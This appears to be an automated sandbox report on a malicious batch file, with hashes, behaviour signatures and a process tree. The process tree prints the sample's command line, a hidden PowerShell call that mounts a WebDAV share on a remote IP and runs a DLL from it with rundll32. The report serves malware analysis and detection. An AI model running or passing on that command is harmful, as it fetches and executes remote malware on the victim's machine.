Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
13/07/2024, 15:15
Static task
static1
Behavioral task
behavioral1
Sample
3073719556276518656.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
3073719556276518656.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
3073719556276518656.bat
-
Size
2KB
-
MD5
a0077fc67ce338b271281c0b0382134e
-
SHA1
6e5fc687557d4d43b3f8677ab064d87fad0aa984
-
SHA256
ccf93f05a78734f7e2d832d8fd480a3b990cb756a8a93e7439add669e2b4e815
-
SHA512
eb53ccaa215536d31366f781094889f4950bb0fe69143a5755067252468bf81c2660ce82c67175727f1157b5bd898c523bee3fe6dffee79fc2507cedaba2b584
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2072 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2072 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2072 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1664 wordpad.exe 1664 wordpad.exe 1664 wordpad.exe 1664 wordpad.exe 1664 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2352 wrote to memory of 1664 2352 cmd.exe 31 PID 2352 wrote to memory of 1664 2352 cmd.exe 31 PID 2352 wrote to memory of 1664 2352 cmd.exe 31 PID 2352 wrote to memory of 2072 2352 cmd.exe 32 PID 2352 wrote to memory of 2072 2352 cmd.exe 32 PID 2352 wrote to memory of 2072 2352 cmd.exe 32 PID 2072 wrote to memory of 2812 2072 powershell.exe 34 PID 2072 wrote to memory of 2812 2072 powershell.exe 34 PID 2072 wrote to memory of 2812 2072 powershell.exe 34 PID 2072 wrote to memory of 2752 2072 powershell.exe 35 PID 2072 wrote to memory of 2752 2072 powershell.exe 35 PID 2072 wrote to memory of 2752 2072 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\3073719556276518656.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:1664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\2277.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2812
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\2277.dll entry3⤵PID:2752
-
-